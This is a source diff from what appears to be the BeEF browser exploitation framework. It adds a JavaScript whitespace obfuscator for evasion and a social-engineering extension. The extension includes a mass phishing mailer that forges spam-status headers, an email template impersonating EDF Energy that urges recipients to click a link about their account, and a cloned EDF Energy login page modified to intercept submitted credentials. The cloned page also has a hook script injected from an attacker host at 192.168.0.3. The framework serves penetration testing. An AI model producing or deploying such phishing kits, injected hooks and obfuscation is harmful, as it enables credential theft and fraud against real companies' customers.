+        end
+
+        def execute(input, config)
+          size = input.length
+          encoded = encode(input)
+          var_name = BeEF::Extension::Evasion::Helper::random_string(3)
+          input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
+          print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
+          input
+        end
+
+        def encode(input)                 
+          output = input.unpack('B*') 
+          output = output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '',  '0' => "\t", '1' => ' ')
+          output
+        end
+      end
+    end
+  end
+end

extensions/notifications/channels/tweet.rb

@@ -38,7 +38,11 @@ module Channels
         config.oauth_token_secret = @config.get('beef.extension.notifications.twitter.oauth_token_secret')
       end
 
-      Twitter.direct_message_create(username, message)
+      begin
+        Twitter.direct_message_create(username, message)
+      rescue
+        print "Twitter send failed, verify tokens have Read/Write/DM acceess..\n"
+      end
     end
   end
   

extensions/social_engineering/config.yaml

@@ -0,0 +1,58 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    extension:
+        social_engineering:
+            enable: true 
+            name: 'Social Engineering'
+            authors: ["antisnatchor"]
+            web_cloner:
+                # NOTE: you must have 'wget' in your PATH
+                add_beef_hook: true
+                user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
+            mass_mailer:
+                # NOTE: you must have 'file' in your PATH
+                user_agent: "Microsoft-MacOutlook/12.12.0.111556"
+                host: "smtp.gmail.com"
+                port: 587
+                use_auth: true
+                use_tls: true
+                helo: "gmail.com" # this is usually the domain name
+                from: "youruser@gmail.com"
+                password: "yourpass"
+                # available templates
+                templates:
+                    default:
+                       # images are by default inline, so if you want to attach something, see 'attachments' below
+                       images: ["beef_logo.png"]
+                       images_cids:
+                          cid1: "beef_logo.png"
+                       attachments: ["beef_attachment.pdf"]
+                    edfenergy:
+                       # my-account.edfenergy.com_mod is an example of a modified page (manually modified in order to
+                       # intercept POST requests) to be served with the web_cloner using use_existing = true
+                       images: ["corner-tl.png", "main.png","edf_logo.png","promo-corner-left.png","promo-corner-right-arrow.png","promo-reflection.png","2012.png","corner-bl.png","corner-br.png","bottom-border.png"]
+                       images_cids:
+                          cid1: "corner-tl.png"
+                          cid2:  "main.png"
+                          cid3:  "edf_logo.png"
+                          cid4:  "promo-corner-left.png"
+                          cid5:  "promo-corner-right-arrow.png"
+                          cid6:  "promo-reflection.png"
+                          cid7:  "2012.png"
+                          cid8:  "corner-bl.png"
+                          cid9:  "corner-br.png"
+                          cid10: "bottom-border.png"

extensions/social_engineering/extension.rb

@@ -0,0 +1,56 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+
+  module RegisterSEngHandler
+    def self.mount_handler(server)
+      server.mount('/api/seng', BeEF::Extension::SocialEngineering::SEngRest.new)
+    end
+  end
+
+  module SocialEngineering
+    extend BeEF::API::Extension
+
+    @short_name = 'social_engineering'
+    @full_name = 'Social Engineering'
+    @description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.'
+
+    BeEF::API::Registrar.instance.register(BeEF::Extension::RegisterSEngHandler, BeEF::API::Server, 'mount_handler')
+  end
+end
+end
+
+# Handlers
+require 'extensions/social_engineering/web_cloner/web_cloner'
+require 'extensions/social_engineering/web_cloner/interceptor'
+require 'extensions/social_engineering/mass_mailer/mass_mailer'
+
+# Models
+require 'extensions/social_engineering/models/web_cloner'
+require 'extensions/social_engineering/models/interceptor'
+#require 'extensions/social_engineering/models/mass_mailer'
+
+# RESTful api endpoints
+require 'extensions/social_engineering/rest/socialengineering'
+
+
+
+
+
+
+
+

extensions/social_engineering/mass_mailer/mass_mailer.rb

@@ -0,0 +1,249 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module SocialEngineering
+      class MassMailer
+        require 'net/smtp'
+        require 'base64'
+        include Singleton
+
+        def initialize
+          @config = BeEF::Core::Configuration.instance
+          @config_prefix = "beef.extension.social_engineering.mass_mailer"
+          @templates_dir = "#{File.expand_path('../../../../extensions/social_engineering/mass_mailer/templates', __FILE__)}/"
+
+          @user_agent = @config.get("#{@config_prefix}.user_agent")
+          @host = @config.get("#{@config_prefix}.host")
+          @port = @config.get("#{@config_prefix}.port")
+          @helo = @config.get("#{@config_prefix}.helo")
+          @from = @config.get("#{@config_prefix}.from")
+          @password = @config.get("#{@config_prefix}.password")
+        end
+
+        # tos_hash is an Hash like:
+        # 'antisnatchor@gmail.com' => 'Michele'
+        # 'ciccio@pasticcio.com' => 'Ciccio'
+        def send_email(template, fromname, subject, link, linktext, tos_hash)
+          # create new SSL context and disable CA chain validation
+          if @config.get("#{@config_prefix}.use_tls")
+            @ctx = OpenSSL::SSL::SSLContext.new
+            @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE # In case the SMTP server uses a self-signed cert, we proceed anyway
+            @ctx.ssl_version = "TLSv1"
+          end
+
+          n = tos_hash.size
+          x = 1
+          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
+          print_info "subject: #{subject}"
+          print_info "link: #{link}"
+          print_info "linktext: #{linktext}"
+
+          # create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
+          smtp = Net::SMTP.new(@host, @port)
+          smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
+
+          if @config.get("#{@config_prefix}.use_auth")
+            smtp.start(@helo, @from, @password, :login) do |smtp|
+              tos_hash.each do |to, name|
+                message = compose_email(fromname, to, name, subject, link, linktext, template)
+                smtp.send_message(message, @from, to)
+                print_info "Mail #{x}/#{n} to [#{to}] sent."
+                x += 1
+              end
+            end
+          else
+            smtp.start(@helo, @from) do |smtp|
+              tos_hash.each do |to, name|
+                message = compose_email(fromname, to, name, subject, link, linktext, template)
+                smtp.send_message(message, @from, to)
+                print_info "Mail #{x}/#{n} to [#{to}] sent."
+                x += 1
+              end
+            end
+          end
+        end
+
+        def compose_email(fromname, to, name, subject, link, linktext, template)
+           msg_id = random_string(50)
+           boundary = "------------#{random_string(24)}"
+           rel_boundary = "------------#{random_string(24)}"
+
+           header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
+           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
+           rel_header = email_related(rel_boundary)
+           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
+
+           images = ""
+           @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
+             images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
+           end
+
+           attachments = ""
+           if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
+             @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
+               attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+             end
+           end
+
+           close = email_close(boundary)
+
+           message = header + plain_body + rel_header + html_body + images + attachments + close
+           print_debug "Raw Email content:\n #{message}"
+           message
+        end
+
+        def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)
+          headers = <<EOF
+From: "#{fromname}" <#{from}>
+Reply-To: "#{fromname}" <#{from}>
+Return-Path: "#{fromname}" <#{from}>
+X-Mailer: #{user_agent}
+To: #{to}
+Message-ID: <#{msg_id}@#{@host}>
+X-Spam-Status: No, score=0.001 required=5
+Subject: #{subject}
+MIME-Version: 1.0
+Content-Type: multipart/alternative;
+ boundary=#{boundary}
+
+This is a multi-part message in MIME format.
+--#{boundary}
+EOF
+          headers
+        end
+
+        def email_plain_body(plain_text, boundary)
+          plain_body = <<EOF
+Content-Type: text/plain; charset="utf8"
+Content-Transfer-Encoding:8bit
+
+#{plain_text}
+
+--#{boundary}
+EOF
+          plain_body
+        end
+
+        def email_related(rel_boundary)
+          related = <<EOF
+Content-Type: multipart/related;
+ boundary="#{rel_boundary}"
+
+
+--#{rel_boundary}
+EOF
+          related
+        end
+
+        def email_html_body(html_body, rel_boundary)
+           html_body = <<EOF
+Content-Type: text/html; charset=ISO-8859-1
+Content-Transfer-Encoding: 7bit
+
+#{html_body}
+--#{rel_boundary}
+EOF
+           html_body
+        end
+
+        def email_add_image(name, path, rel_boundary)
+          file_encoded = [File.read(path)].pack("m") # base64 encoded
+          image = <<EOF
+Content-Type: #{get_mime(path)};
+ name="#{name}"
+Content-Transfer-Encoding: base64
+Content-ID: <#{name}>
+Content-Disposition: inline;
+ filename="#{name}"
+
+#{file_encoded}
+--#{rel_boundary}
+EOF
+          image
+        end
+
+        def email_add_attachment(name, path, rel_boundary)
+          file_encoded = [File.read(path)].pack("m") # base64 encoded
+          image = <<EOF
+Content-Type: #{get_mime(path)};
+ name="#{name}"
+Content-Transfer-Encoding: base64
+Content-Disposition: attachment;
+ filename="#{name}"
+
+#{file_encoded}
+--#{rel_boundary}
+EOF
+          image
+        end
+
+        def email_close(boundary)
+          close = <<EOF
+--#{boundary}--
+EOF
+          close
+        end
+
+        # Replaces placeholder values from the plain/html email templates
+        def parse_template(name, link, linktext, template_path, template)
+          result = ""
+          img_config = "#{@config_prefix}.templates.#{template}.images_cids"
+          img_count = 0
+          File.open(template_path, 'r').each do |line|
+             # change the Recipient name
+             if line.include?("__name__")
+               result += line.gsub("__name__",name)
+             # change the link/linktext
+             elsif line.include?("__link__")
+               if line.include?("__linktext__")
+                 result += line.gsub("__link__",link).gsub("__linktext__",linktext)
+               else
+                 result += line.gsub("__link__",link)
+               end
+             # change images cid/name/alt
+             elsif line.include?("src=\"cid:__")
+               img_count += 1
+               if line.include?("name=\"img__") || line.include?("alt=\"__img")
+                 result += line.gsub("__cid#{img_count}__",
+                                     @config.get("#{img_config}.cid#{img_count}")).gsub("__img#{img_count}__",
+                                     @config.get("#{img_config}.cid#{img_count}"))
+               else
+                 result += line.gsub("__cid#{img_count}__",@config.get("#{img_config}.cid#{img_count}"))
+               end
+             else
+               result += line
+             end
+          end
+          result
+        end
+
+        def get_mime(file_path)
+          result = ""
+          IO.popen(["file", "--mime","-b", "#{file_path}"], 'r+') do |io|
+            result = io.readlines.first.split(";").first
+          end
+          result
+        end
+
+        def random_string(length)
+           output = (0..length).map{ rand(36).to_s(36).upcase }.join
+        end
+      end
+    end
+  end
+end
+

extensions/social_engineering/mass_mailer/templates/default/mail.html

@@ -0,0 +1,21 @@
+<html>
+<head>
+<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
+</head>
+<body bgcolor="#FFFFFF" text="#000000">
+Hi __name__,<br>
+<br>
+We would like to inform you that your BeEF order has been successful.<br>
+You can check the status of your hook at the following link:<br>
+<!-- be sure to have link and linktext placeholders on the same line, like the following: -->
+<a href="__link__">__linktext__</a><br>
+<br>
+For convenience, we also attached a resume of your order as PDF.<br>
+<br>
+Regards,<br>
+The BeEF team<br>
+<!-- be sure to have different images on different lines, like the following: -->
+<img src="cid:__cid1__" name="__img1__" alt="__img1__"><br>
+<!--<img src="cid:cid2" name="img2" alt="img2"><br>-->
+</body>
+</html>

extensions/social_engineering/mass_mailer/templates/default/mail.plain

@@ -0,0 +1,10 @@
+Hi __name__,
+
+We would like to inform you that your BeEF order has been successful.
+You can check the status of your hook at the following link:
+__link__
+
+For convenience, we also attached a resume of your order as PDF.
+
+Regards,
+The BeEF team

extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html

@@ -0,0 +1,54 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF8">
+   <meta name="Generator" content="StreamServe MailOUT"><title>
+</title><style type="text/css">P {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px;}</style>
+</head><body><div><p><font face=MS Sans Serif color=#000000 size=1>
+    <table style="width:618px; border-collapse:collapse;">
+        <tr><td style="padding:28px; background-color: #ff5716;">
+            <table style="border-collapse:collapse; font-size:12px; width:562px;" cellpadding="0" cellspacing="0" border="0">
+                <tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:top;">
+                    <img src="cid:__cid1__" style="display:block; width:11px; height:11px;" />
+                </td><td colspan="2" style="width:379px; background-color:white;"></td>
+                    <td rowspan="3" colspan="2" style="padding: 0px; margin:0px; line-height:0px; background-color:white; vertical-align:top;">
+      <img src="cid:__cid2__" style="display:block; width:155px; height:291px; " alt="Cityscape" /></td></tr>
+<tr><td style="background-color:white;" rowspan="3"></td><td style="width:60px; vertical-align:top; background-color:white;">
+    <img src="cid:__cid3__" style="display:block; width:44px; height:65px;" alt="EDFEnergy" /></td>
+    <td style="width:315px; background-color:white;">
+        <h1 style="font-family: arial, sans-serif; font-weight:bold; font-size:16pt; color:#09357a; margin:0;">
+            Important information regarding your account</h1><br /></td></tr>
+<tr><td colspan="2" style="font-family: arial, sans-serif; font-size:11pt; color:#434343; width:375px; background-color:white; vertical-align:top;" >
+    <p style="margin: 16px 0px 16px 0px;"><span style="color:#09357a; font-weight: bold; font-size:13pt;" >
+Dear __name__</span></p><p style="margin-bottom:16px;">You have an important message regarding your EDF Energy account. </p>
+    <p style="margin-bottom:16px;">As this message contains confidential information you must
+        <a href="__link__" style="color: #013976;">click here</a> to view the message.</p>
+    <p style="margin-bottom:16px;">In order to read your messages you must be registered to MyAccount which you can do using the same link. </p>
+<br/><table style="border-collapse:collapse; width:292px; padding:0px;"><tr>
+    <td style="width:11px; background-color:#09357a; padding:0px; vertical-align:top;">
+        <img src="cid:__cid4__"
+             style="display:block; width:11px; height:26px;" /></td>
+    <td style="background-color: #09357a; color:white; width:282px; padding:0 0 0 5px; font-family:Arial; font-weight:bold; font-size:10pt;">
+        <a href="__link__" style="color:white; text-decoration:none;">Continue to MyMessages</a></td>
+    <td style="width:27px; background-color:#09357a; padding:0px; vertical-align:top;">
+        <img src="cid:__cid5__" style="display:block; width:27px; height:26px;" /></td></tr>
+    <tr><td colspan="3" style="width:293px; padding:0px;">
+        <img src="cid:__cid6__" style="display:block; width:293px; height:9px;" />
+        </td></tr></table></td></tr><tr><td colspan="2" style="width:375px; background-color:white;"></td>
+                <td colspan="2" style="text-align:right;background-color:white;">
+                    <img src="cid:__cid7__" style="display:block; float:right; width:95px; height:69px;" alt="London 2012" /></td></tr>
+<tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:bottom;">
+    <img src="cid:__cid8__" style="display:block; width:11px; height:11px;" /></td>
+    <td colspan="2" style="width:375px; background-color:white;"></td>
+    <td style="width:144px; background-color:white;">&nbsp;</td>
+    <td style="padding: 0px; margin:0px; line-height:0px; text-align:right; width:11px; background-color:white; vertical-align:bottom;">
+        <img src="cid:__cid9__" style="display:block; padding: 0px; margin: 0px; width:11px; height:11px;" />
+    </td>
+</tr>  </table></td></tr><tr>
+        <td style="padding: 0px;">
+            <img src="cid:__cid10__" style="display:block; width:618px; height:27px;" />
+        </td></tr><tr><td style="padding:15px 28px; background-color:#ffdecf;">
+        <p style="text-align:center; font-family: arial, sans-serif; font-weight:bold; font-size:9pt; color:#001f40;">
+            EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office is at 40 Grosvenor Place, London, SW1X 7EN,
+incorporated in England and Wales. EDF Energy Customers plc. is a wholly owned subsidiary of EDF Energy plc.
+            The responsibility for performance of the supply obligations for all EDF Energy supply contracts rests with EDF Energy Customers plc.
+            <br /><br />The official Emblems of the London Organising Committee of the Olympic Games <br />and Paralympic Games Ltd are 2007 LOCOG. All rights reserved.</p></td></tr>
+</table></font></p></font></div></body></html>

extensions/social_engineering/mass_mailer/templates/edfenergy/mail.plain

@@ -0,0 +1,19 @@
+Important information regarding your account
+
+Dear __name__
+
+You have an important message regarding your EDF Energy account.
+
+As this message contains confidential information you must click here to view the message:
+__link__
+
+In order to read your messages you must be registered to MyAccount which you can do using the same link:
+__link__
+
+EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office
+is at 40 Grosvenor Place, London, SW1X 7EN, incorporated in England and Wales. EDF Energy Customers plc.
+is a wholly owned subsidiary of EDF Energy plc. The responsibility for performance of the supply obligations
+for all EDF Energy supply contracts rests with EDF Energy Customers plc.
+
+The official Emblems of the London Organising Committee of the Olympic Games
+and Paralympic Games Ltd are © 2007 LOCOG. All rights reserved.

extensions/social_engineering/mass_mailer/templates/edfenergy/my-account.edfenergy.com_mod

@@ -0,0 +1,790 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
+<html><head><LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/glbl/glbl_nn7.css?7.0.20.0.1">
+<LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/prtl_std/prtl_std_nn7.css?7.0.20.0.1">
+
+<!-- EPCF: BOB Core -->
+<meta http-equiv="Content-Script-Type" content="text/javascript">
+<script src="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.epcf.loader/script/optimize/js13_epcf.js?7.00001620"></script>
+<script>
+<!--
+EPCM.relaxDocumentDomain();
+EPCM.init( {
+Version:7.00001620,
+Level:1,
+PortalVersion:"7.00.200908152330",
+DynamicTop:false, // [service=true nestedWinOnAlias=false]
+UAType:21, // [Mozilla]
+UAVersion:5.0,
+UAPlatform:1, // [Win]
+UIPMode:"1", // [Default=1, User=0, Personalize=true]
+UIPWinFeatures:"",
+UIPPortalPath:"https://my-account.edfenergy.com:443/irj/portal/anonymous",
+UIPPopupComp:"",
+UIPPopupCompSize:"",
+UIPPopupMsgNN:"Your current page contains unsaved data.\r\nDo you want to continue with navigation and open a new window?",
+UIPPopupMsgND:"Your current page contains unsaved data.\r\nDo you want to discard the changes and open the content in the same window?",
+DBGException:false
+} );
+EPCM.DSM.init( {
+TerminatorURL:"/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator",
+WinEmptyUrl:"/irj/portalapps/com.sap.portal.dsm/images/empty.gif",
+ForcedUserDebug:false,
+KeepAliveActive:false,
+KeepAliveDelta:840,
+KeepAliveStopAfter:36000
+} );
+function SAPWP_receiveSessInfo( sessInfo, frameRef ){
+  EPCM.DSM.processSession( sessInfo, frameRef );
+}
+//-->
+</script>
+<!-- EPCF: EOB Core -->
+
+<script type="text/javascript">
+/*HTML Business for Java, 645_SP_REL, 529005, Wed Jul 22 15:27:56 BST 2009*/
+ur_system = {doc : window.document , mimepath :"/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/common/", stylepath : "/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/ur/", emptyhoverurl : "/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html", is508 : false, dateformat : 1, domainrelaxing : "MINIMAL"};
+</script>
+<title >MyAccount</title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.httpconnectivity.httpauthentication/scripts/CAManagerScript.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/HistoryFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/NavigationFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/FrameworkSupport.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/scripts/pagesupport.js" ></script><link  REL=STYLESHEET  HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/main_v1.5.css?7.0.20.0.1"  TYPE="text/css" ><link  REL=STYLESHEET  HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/myaccount_v3.css?7.0.20.0.1"  TYPE="text/css" ><script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
+</head><body class="prtlBody urFontBaseFam urScrl">
+<!-- EPCF: Component com.sap.portal.navigation.portallauncher.anonymous, kegighenibibncgidhmmmfdjjggfpmhm -->
+<Script>
+var caEngine = new CAManager('/irj/servlet/prt/portal/prtroot/com.sap.portal.httpconnectivity.httpauthentication.Engine','dialogHeight:10;dialogWidth:20;center:1;help:0;status:0');
+caEngine.registerCAEvent('com.sap.portal.httpconnectivity.httpauthentication','Teach',caEngine,'eventCallBack');
+</Script>
+
+
+
+
+
+
+
+
+
+
+<script>
+
+var disableWorkProtectCheck = false;
+
+
+function popupUnsavedDataBeforeUnload(evt)
+{
+	if ((typeof pageTitleBar != "undefined") && pageTitleBar.backForwardLink)
+	{
+		pageTitleBar.backForwardLink = false;	
+	}
+	else
+	{
+		evt = (evt) ? evt : ((window.event) ? event : null);
+		if ( EPCM.getUAType() != EPCM.MSIE && EPCM.getUAType() != EPCM.MOZILLA) return;
+		if ( EPCM.getGlobalDirty() && (! disableWorkProtectCheck ))
+		{
+			if(EPCM.getUAType() == EPCM.MSIE )
+			{
+				evt.returnValue = 'You have unsaved data';
+			}
+			else
+			{		
+				evt.preventDefault();
+				evt.stopPropagation();
+				return 'You have unsaved data';
+			}
+		}
+	}
+}
+
+try{
+     if ( EPCM.getUAType() == EPCM.MSIE || EPCM.getUAType()== EPCM.MOZILLA){
+       if (window==EPCM.getSAPTop()){  
+         window.onbeforeunload = popupUnsavedDataBeforeUnload;
+       }   
+     }
+} catch(ex){} 
+</script><script>frameworkSupport.init({anonymous:true,phase:'framework',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous'});</script><script>frameworkSupport.init2({contentAreaURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage!2fcom.sap.portal.contentarea',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous',innerPage:'pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.sap.portal.innerpage',innerPageFrameURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage',tlnComp:'/irj/portalapps/com.sap.portal.navigation.toplevel',ObjBasedNavigationURL:'/irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.objbased.ObjBasedNavigation',serverPath:'https://my-account.edfenergy.com:443',usedConnectors:''});</script>	
+
+<span id=divChangeContent name=divChangeContent style="position:absolute;height:0;width:0;top:-5000;left:-5000">
+	<FORM action="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com" method=POST id="frmChangeContent" name="frmChangeContent">
+		<INPUT type="hidden" id=NavigationTarget name=NavigationTarget>
+		<INPUT type="hidden" id=RelativeNavBase name=RelativeNavBase></INPUT>
+	<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUhgPrZWDRw08VLuhthw6Alf_ythxgZRxx-bn2SU9GjY2G8UFdotsliPfe5ArbcVEM="></FORM>
+<form id='obnNavForm' method='post' target='obnNavIFrame' action="/irj/portal/anonymous">		<input type='hidden' name='systemAlias'>
+		<input type='hidden' name='businessObjName'>
+		<input type='hidden' name='objValue'>
+		<input type='hidden' name='operation'>
+		<input type='hidden' name='usePost' value='false'>
+		<input type='hidden' name='source'>
+		<input type='hidden' name='resolvingMode' value='Default'>
+	<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUZncgeJn0nDtoKgRZLTHoNG9b8gjXLxyg1JXcdz0DDEk4i74Lypj65OK5A4udLxsoXWiF7rrPTfgID-qUNr8-D6aXCTTHzGtpGEifQUi875Ykz1XmE69Xx"></form>
+</span>
+<iframe src='https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html' style='position:absolute;height:0;visibility:hidden' name='obnNavIFrame' id='obnNavIFrame'></iframe>
+<script>var disablePersonalize = true;</script>
+<!-- EPCF: Component com.sap.portal.pagebuilder.pageBuilder, agnkfkoliedeidmfenendpdjjggfpmic -->
+<SCRIPT>var emptyDocumentUrl = "/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html";</SCRIPT>
+<!-- EPCF: Component com.sap.portal.layouts.framework.light_framework, fbkobmdfenlemkgnkdbnmfdjjggfpmip -->
+
+
+
+
+
+<SCRIPT>if (typeof EPCM != "undefined") {EPCM.relaxDocumentDomain();} else { var d=document.domain; if (d.search(/^\d+\.\d+\.\d+\.\d+$/)>=0) {} else { var l=d.indexOf("."); if (l>=0) {d=d.substr(l+1)} } if (document.domain != d) {document.domain = d;}}
+pageSupport.pageHelperUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.PageHelper';
+pageSupport.proxyModesUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.IviewModeProxy';
+pageSupport.addPageId('pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg','0','local');
+pageSupport._addIvuPageId("pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.edfe.orchard.pct.Logon_ivu","page0ivu0");
+pageSupport._addIViewBank("page0ivu0",new iviewBank("","",pageSupport.EMBEDDED,1,"0","","GET"));
+</SCRIPT>
+    <script>
+        document.body.style.margin=0;
+        document.body.scroll = "no";
+       
+       
+    </script>
+ 
+            <TABLE style="WIDTH: 100%" cellSpacing=0 cellPadding=0  class="prtlHeaderCon"  ><TR><TD>
+<!-- EPCF: Component com.edfe.orchard.Logon.LogonComp, fchmhdeefnpeknleddanfldjjggfpmig -->
+
+
+
+
+
+
+
+
+
+
+
+
+    
+
+<html xmlns:xalan-nodeset="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" xmlns="http://www.w3.org/1999/xhtml">
+  <head>
+	<meta name="generator" content="HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
+	<title>MyAccount</title>
+
+
+	<link rel="SHORTCUT ICON" href="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/favicon/favicon.ico" />
+	
+	
+	<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/edfenergy-ga-script-n.js"></script>	
+		
+		<script type="text/javascript">
+		loadTrackCode('UA-25608035-1');
+	
+			  	
+				  _gaq.push(['_trackPageview', 'Login']);
+					
+		</script>
+	
+
+<script language="JavaScript">
+/*var emailRegEx = /^([a-zA-Z0-9_\.\!\#\$\%\^\&\*\{\}\~\`\+\_\=\?\'\|\"\-]{2,})\@(([a-zA-Z0-9\-]{2,})\.)+([a-zA-Z]{2,4})+$/;*/
+var emailRegEx = /^\s*[\w\-\+_\{\}\~\`\+\_\=\?\'\|\"\-\!\#\$\%\^\&\*]+(\.[\w\-\+_\']+)*\@[\w\-\+_]+\.[\w\-\+_]+(\.[\w\-\+_]+)*\s*$/;
+var Monitor_Flag1 = true;
+	document.onkeyup = checkKeyPressed;
+
+	window.history.forward(1);
+	
+	function EDFEDisableSubmitButton1( button_text1, button_id1 )
+	{
+	var bid = button_id1;
+	var btext = button_text1;
+	document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
+	}
+
+	function checkCode()
+	{
+		if(event.keyCode==13)
+		{
+			event.keyCode=9;
+		}	
+	}
+	function checkKeyPressed()
+	{
+		if(event.keyCode==13)
+		{	
+			
+			if(Monitor_Flag1!=null && Monitor_Flag1==true){
+			
+			callGA('yes');
+			}
+			else
+			{
